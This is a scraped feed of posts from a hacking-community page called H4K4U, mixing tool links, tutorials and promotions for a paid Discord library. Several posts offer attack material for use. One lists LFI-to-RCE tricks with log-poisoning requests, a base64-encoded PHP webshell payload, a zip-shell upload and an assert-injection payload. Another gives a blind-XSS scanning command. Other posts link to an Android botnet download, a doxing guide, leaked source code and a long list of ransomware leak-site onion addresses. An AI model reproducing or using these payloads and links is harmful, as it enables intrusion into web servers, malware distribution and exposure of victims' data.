H4K4U

to learn the art programming you must read .And remember that hacker is always a good reader Not a. show off

GitHub - Drayko/Bot-Bounty: Python Script for Telegram Bot is specially built for pentest & bug bounty. It's like a telegram shell.

06/08/2022

💻 Manage VPS and receive notifications via Telegram bot

I noticed a python script on GitHub that allows you to execute commands on your server through the Telegram bot and sends the results of the ex*****on.
Can be useful when executing long commands, especially if they require user interaction.

Link to GitHub
https://github.com/Drayko/Bot-Bounty

GitHub - Drayko/Bot-Bounty: Python Script for Telegram Bot is specially built for pentest & bug bounty. It's like a telegram shell. Python Script for Telegram Bot is specially built for pentest & bug bounty. It's like a telegram shell. - GitHub - Drayko/Bot-Bounty: Python Script for Telegram Bot is specially built for p...

Online Courses - Learn Anything, On Your Schedule | Udemy

14/07/2022

DOWNLOAD ANY UDEMY COURSE DIRECTLY TO YOUR DRIVE OR TEAM DRIVE

1. You must have a Udemy account to follow this tutorial. Use your own account or use below method.
2. Now login into your Udemy account.
3. After you are logged in, right click anywhere on the udemy website and choose Inspect or you can press shortcut button F12.
4. Choose Application tab, then choose Cookies -> https://www.udemy.com or https://gale.udemy.com on the left.
5. On the right, type into filter: access_token , double click and copy the value inside Value box. Save this Access Token somewhere as you will need this later.
6. Now Download the Colab Notebook from the link given below.
Click Here: https:// dlsharefile. com/file/NjM2NGEzOWYt
7. After downloading the file go to https://colab.research.google.com and upload the file you downloaded above.
8. Now run the first, second and third cell one by one.
9. In the fourth cell fill all the details accordingly.
-First Enter the Url of the Course which you want to download.
-In Download_Dir enter the directory in which you want to download the course.
-In the Access_Token field enter the token you got in step 5.
-Only change it if you want to download subtitles in language other than English.
-Enter the quality in which you want to download course videos.
10. Click the play button and voila!!! It will start downloading the course in the directory you specified.

Note: If the size of the course is big, it may take some time to appear in your drive or team drive

Online Courses - Learn Anything, On Your Schedule | Udemy Udemy is an online learning and teaching marketplace with over 185,000 courses and 49 million students. Learn programming, marketing, data science and more.

10/07/2022

COPERNIX

Worldwide map of geolocated Wikipedia
articles.

It's possible to enter the name of a locality to see articles about local streets or attractions.

Or enter a person's name to see what places are associated with him/her.

https://copernix.io

Copernix - Know thy World Explore the world using Wikipedia on a map. Copernix lets you search for information in a new, easy and intuitive way.

06/07/2022

We Never Knew that our page is still Growing we want to increase the community and we wanted to communicate with all of you in single forum. So we are deciding to run our old server back, We need web developers
Interested memeber can mail us at
[email protected]

23/06/2022

ROGUE V6.2 ANDROID BOTNET PREMIUM

https://anonfiles.com/7755nep0y8/Rogue_v6.2_rar

GitHub - tracelabs/tlosint-live: Trace Labs OSINT Linux Distribution based on Kali.

20/01/2022

https://github.com/tracelabs/tlosint-live

GitHub - tracelabs/tlosint-live: Trace Labs OSINT Linux Distribution based on Kali. Trace Labs OSINT Linux Distribution based on Kali. - GitHub - tracelabs/tlosint-live: Trace Labs OSINT Linux Distribution based on Kali.

Upgrade from LFI to RCE via PHP Sessions

09/11/2021

1. Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent:
———————————————————
2. SSH Log Poisoning

ssh ''com

/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning

telnet target(.)com 25
MAIL FROM:
RCPT TO:

/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload

i. Add this to EXIF data of s.png:
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent:

If no success then try writing files.
———————————————————
6. php://filter

Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload

echo "" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php

/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:

/show.php?file=data://text/plain,
/show.php?file=data://text/plain,
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}

Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD

i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://

/show.php?page=expect://ls
———————————————————
12. input://

POST /index.php?page=php://input HTTP/1.1

———————————————————
13. RCE via vulnerable assert statement

Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");

Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:

/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:

Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
———————————————————

Upgrade from LFI to RCE via PHP Sessions I recently came across an interesting Local File Inclusion vulnerability in a private bug bounty program which I was able to upgrade to a Remote Code Ex*****on. The interesting fact about this and what makes it different is that the underlying operating system was pretty hardened and almost all usua...

07/09/2021

MediaFire MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.

31/08/2021

hpAndro Vulnerable Application Challenges
part 1 - https://nibarius.github.io/learning-frida/2021/08/26/hpandro-part1
part 2 - https://nibarius.github.io/learning-frida/2021/08/28/hpandro-part2
part 3 - https://nibarius.github.io/learning-frida/2021/08/29/hpandro-hidden-levels

hpAndro Vulnerable Application Challenges - part 1 hpAndro Vulnerable Application is an Android CTF with a lot of challenges (100 at the time of writing) and new challenges are added every now and then. The challenges are based on the OWASP Mobile Security Testing Guide and there are many different types of challenges available. I’ve solved all th...

Join the H4k4U { H4CK3R LI8R4RY } Discord Server!

31/08/2021

https://freetraining.dfirdiva.com/

For more underground infosec stuff

https://discord.gg/zFSamRn

Join the H4k4U { H4CK3R LI8R4RY } Discord Server! Check out the H4k4U { H4CK3R LI8R4RY } community on Discord - hang out with 72 other members and enjoy free voice and text chat.

The Hitchhiker’s Guide to Online Anonymity

15/08/2021

Hitchhikers guide of anonymity + many more

https://anonymousplanet.org/guide.html

For. More cool stuff
Join - https://discord.gg/KeQs85mh

The Hitchhiker’s Guide to Online Anonymity The Hitchhiker’s Guide to Online Anonymity

15/08/2021

After one year we can proudly say that we are back and opening our gates of most extensive hacking library of all time ( H4K4U) where almost every resources are available for any hacker, Researcher, infosec geek on our discord library. Discord server is big so it can take time to open all channels so stay connected.

Invite link

https://discord.gg/KeQs85mh

Tell Them We Are Back

SHARE as Much as YOU CAN

Join the H4k4U { H4CK3R LI8R4RY } Discord Server! Check out the H4k4U { H4CK3R LI8R4RY } community on Discord - hang out with 49 other members and enjoy free voice and text chat.

04/08/2021

Find Reflected, Blind and DOM XSS with Dalfox and Burp Suite

We collect a list of site URLs and place them in the urls_list.txt file. Then, to search for Blind XSS, register on the site xsshunter.com and get a link of the form shadow.xss.ht, where your nickname will be in place of "shadow".

Use the command below to find XSS using Dalfox and send each request to Burp Suite for manual testing:

dalfox file urls_list.txt --mining-dom --deep-domxss --ignore-return -b '"> ' --follow-redirects --proxy http: //127.0.0.1:8080

XSS Hunter

21/07/2021

1. Analysis for the REvil Ransomware payload found in the Kaseya incident

https://chuongdong.com/reverse%20engineering/2021/07/11/REvilRansomware

2. BIOPASS RAT:

New Malware Sniffs Victims via Live Streaming

https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html

Hackers Spread BIOPASS Malware via Chinese Online Gambling

REvil Ransomware Malware Analysis Report - REvil Ransomware

God Doxing and anonymity.pdf - AnonFiles

15/07/2021

Doxing God

https://anonfiles.com/ff49ec28ua/God_Doxing_and_anonymity_pdf

God Doxing and anonymity.pdf - AnonFiles

03/07/2021

Leaked source code

http://wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion/content/3

Payload.bin

22/06/2021

Jackpot

https://drive.google.com/drive/folders/1aoRMOqhVRjTSSGvDSW_36VRur_Iv5k-P

UFOs: The Central Intelligence Agency (CIA) Collection - The Black Vault

06/06/2021

CIA related UFO records declassified and released. 'All' US govt documents on UFOs are now searchable.

2,700 pages of information collected and recorded by the US govt regarding UFOs. The documents date back as far as the 1980s.

https://www.theblackvault.com/documentarchive/ufos-the-central-intelligence-agency-cia-collection/

UFOs: The Central Intelligence Agency (CIA) Collection - The Black Vault Background Below you will find a collection of CIA related UFO records. The Black Vault’s connection to the CIA in getting some of these UFO documents released goes back to 1996. Originally, the CIA would only release about 1,000 pages that had been previously disclosed after a FOIA court case in ...

05/06/2021

A selection of services for anonymous file transfer

Let's say you have a need to secretly send a large file to an equally large audience. How can you send it anonymously without leaving a trace? We have made for you a selection of the best anonymous file hosting services in the clearnet.

Selection:
▪️ privatlab.com
▪️ anonfiles.com
▪️ wetransfer.com
▪️ onionshare.org
▪️ dropmefiles.com
▪️ filedropper.com
▪️ anonymousfiles.io

All information is provided for informational purposes only. We are not responsible for your actions.

PrivatLab - temporary mail, privnote, file upload storage temporary mail, privnote, file upload storage

01/06/2021

Fake ROOT rights

Hello everyone.
Probably everyone has encountered such a problem when a utility is needed, but it requires root rights, which you do not have, and it also often happens that it is difficult and even completely impossible to root for a certain device.
Well, I found a solution, we will emulate the root using one utility, but I immediately warn you that the method does not work with all programs.

Installation:
▪️apt update -y
▪️apt upgrade -y
▪️apt install git
▪️git clone https://github.com/B41B4L/FakeRoot
▪️cd FakeRoot
▪️chmod + x Root.sh

Using:
▪️. / Root.sh - launch the utility

Done, for verification, we can write the command:
▪️whoami
The result should be like this - root

There is also an alternative installation method:
▪️pkg install fakeroot

And to activate the Route mode, we always write the command:
▪️fakeroot

You can somehow deceive the system, but if there is a possibility, then it's worth spending some amount of time and finally putting normal Ruth rights.

Our chat 💬

All information is provided for informational purposes only. We are not responsible for your actions.

B41B4L/RootProot Fake Root Termux. Contribute to B41B4L/RootProot development by creating an account on GitHub.

01/06/2021

RELEASE: Over 13,500 files hacked from Sberbank of Russia's translation bureau, providing a unique insight into the interests of the bank and its clients. Among other items, translations include political analysis, military sales and open source reporting.

https://ddosecrets.com/wiki/Sberbank_of_Russia

Sberbank of Russia - Distributed Denial of Secrets Over 13,500 files hacked from Sberbank of Russia's translation bureau, providing a unique insight into the interests of the bank and its clients. Among other items, translations include political analysis, military sales and open source reporting.

29/05/2021

http://tacpozmyh6yk5hbvdptvs3bfntihler6cy7au75ry365tmucznttkuyd.onion

Forums

16/04/2021

ransomware leak
http://hxt254aygrsziejn.onion

hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion

wqmfzni2nvbbpk25.onion/partners.html

nbzzb6sa6xuura2z.onion

http://avaddongun7rngel.onion

http://darksidedxcftmqa.onion

http://p6o7m73ujalhgkiv.onion

http://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion

http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion

http://egregoranrmzapcv.onion

http://rgleak7op734elep.onion

http://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion

http://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion

http://ixltdyumdlthrtgx.onion

http://ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad.onion

http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion

mountnewsokhwilx.onion

http://lockbitkodidilol.onion

http://wobpitin77vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion

http://cuba4mp6ximo2zlo.onion

http://ekbgzchl6x2ias37.onion

wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion

http://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnz6hhj7id.onion

http://pysa2bitc5ldeyfak4seeruqymqs4sj5wt5qkcq7aoyg4h2acqieywad.onion

http://anewset3pcya3xvk73hj7yunuamutxxsm5sohkdi32blhmql55tvgqad.onion

http://ransomwr3tsydeii4q43vazm7wofla5ujdajquitomtd47cxjtfgwyyd.onion

http://rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad.onion

Corporate Leaks 0 Seven Seas. Part 1. Posted on April 7, 2021 by site_admin sevenseas_part_1.7zsevenseas_part_1.txt Headquarters: Dubai Investments Park, Plot 598-668, Dubai, Dubai, United Arab EmiratesPhone: +971 4 803 3333Website: www.sevenseasgroup.comEmployees: 1,000Revenue: $326 Million Seven Seas

06/04/2021

Our YouTube content will be lost shortly we got two communities guidelines strikes. We tried our best to serve you guys but to be honest we can not fight with the existing system and monopoly of big gaints though we are still active on TOR

09/03/2021

Hello everyone unfortunately we are banned to upload the content on YouTube due to its community guidelines. We have many request to open our discord library again, Though we are opening the gates of our H4K4U The Extensive Hacker library on discord where update each day new stuff with content related to infosec leaks, news, exploits, tool, CVE, latest working onion links, courses and everything which need you to grown in infosec careers. We recommend you to join official discord with Paid membership.

Life Time Full Server Access - $10
You can pay through PayPal via
https://www.paypal.me/7H3H4WK

Once you pay via PayPal send the screen shot of payment and DM us on our page or you can send your payment details by email on
[email protected]

( Server verification can take 24 hours after we reach you and confirm your real I'd with payment )

We bring the information at one place so that you don't have to recon at another place. We will bring information each day and before anyone else on planet.

25/02/2021

YouTube Community Strike
Thanks hater for striking on video and the content
We have to create our own platform no option left
I thank you all who supported me and subscribed my YouTube channel and even from the time of discord...

Cross-Site-Script POC | #XSS | #Reflectedxss POC | #xss | #bugbounty | #WAPT #Burpsuitpro | #h4k4u

13/02/2021

Its not about or but its all about fuzzing with in the or webapp and looking for each vulnerable parameter and hunt for bugs

Another POC on

https://youtu.be/ITP09y12CSA

#CriticalFileFound | #SensitiveDataExposure | #BurpSuit #ActiveScan ++ | #Paramspider + #DirSearch

07/02/2021

Hello everyone i am back with another tutorial where we gonna learn about Web Pen testing & recon process and finding some critical files on web server which can lead to some serious information exposer
1 Installing active scan ++ on burp pro & Using it for web recon process
2 using Dirsearch + paramspider
3 Finding critical files on server (including htaacess + log files)
Though i can use inturder too in burp but not in this demo

https://youtu.be/ejRLy_nhmLQ

#CriticalFileFound | #SensitiveDataExposure | #BurpSuit #ActiveScan ++ | #Paramspider + #DirSearch is a mature command-line tool designed to directories and files in . ++ extends Burp Suite's active and passive s...

Creating your own GSM Network with LimeSDR | Lets Hack It

04/08/2020

https://lucasteske.dev/2019/12/creating-your-own-gsm-network-with-limesdr/

Creating your own GSM Network with LimeSDR | Lets Hack It Creating your own GSM Network with LimeSDR DISCLAIMER: This procedure is highly ilegal basically anywhere in the world. Be sure to run this in a closed RF environment (aka Faraday Cage) This article works with any LimeSDR version. For this example we will use the Osmocom GSM Stack in the...

#Python #Variable | #DataTypes in #Python | Back to Basic | EP.5

30/07/2020

ok so after a long time i am back with some python tutorials for bgnr on variables in python

https://youtu.be/S9y7GkduRiU

#Python #Variable | #DataTypes in #Python | Back to Basic | EP.5 A is a reserved memory location to store values. In other words, a variable in a python program gives data to the computer for processing. ...

Claim ownership or report listing

Contact the business

Click here to send a message to the business

Website

https://discord.gg/QMBGhhe